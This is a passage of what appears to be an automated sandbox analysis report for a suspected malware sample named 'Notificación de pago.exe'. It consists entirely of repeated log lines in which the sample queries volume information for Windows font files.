          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
